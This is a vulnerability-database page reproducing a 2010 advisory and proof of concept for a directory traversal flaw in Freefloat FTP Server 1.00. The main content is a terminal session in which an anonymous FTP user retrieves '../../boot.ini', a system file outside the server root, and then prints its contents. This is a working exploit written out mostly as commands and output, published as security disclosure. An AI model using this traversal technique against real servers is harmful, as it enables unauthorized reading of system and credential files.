Lucene search
K

Freefloat FTP Server 1.00 Directory Traversal

🗓️ 06 Dec 2010 00:00:00Reported by Pr0T3cT10nType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Freefloat FTP Server v1.00 Remote Directory Traversal Vulnerability allows unauthorized file rea

Code
`# _ ____ __ __ ___  
# (_)____ _ __/ __ \/ /_____ ____/ / _/_/ |  
# / // __ \ | / / / / / //_/ _ \/ __ / / / / /  
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /  
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/   
# Live by the byte |_/_/   
#  
# Members:  
#  
# Pr0T3cT10n  
# -=M.o.B.=-  
# TheLeader  
# Sro  
# Debug  
#  
# Contact: [email protected]  
#  
# -----------------------------------  
# Freefloat FTP Server is vulnerable for a path traversal, the following will explain you how to read files  
# The vulnerability allows an unprivileged attacker to read files whom he has no permissions to.  
# The vulnerable FTP command are:  
# * GET - Read File  
#-----------------------------------  
# Vulnerability Title: Freefloat FTP Server v1.00 Remote Directory Traversal Vulnerability  
# Date: 06/12/2010  
# Author: Pr0T3cT10n  
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip  
# Affected Version: 1.00  
# Tested on Windows XP Hebrew, Service Pack 3  
# ISRAEL, NULLBYTE.ORG.IL  
###  
C:\Documents and Settings\Admin>ftp 127.0.0.1  
Connected to 127.0.0.1.  
220 FreeFloat Ftp Server (Version 1.00).  
User (127.0.0.1:(none)): anonymous  
331 Password required for anonymous.  
Password:  
230 User anonymous logged in.  
ftp> GET ../../boot.ini  
200 PORT command successful.  
150 Opening BINARY mode data connection for \boot.ini(211 bytes).  
226 Transfer complete.  
ftp: 211 bytes received in 0.00Seconds 211000.00Kbytes/sec.  
ftp> bye  
221 Goodbye  
  
C:\Documents and Settings\Admin>type boot.ini  
[boot loader]  
timeout=30  
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS  
[operating systems]  
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional"  
/noexecute=optin /fastdetect  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation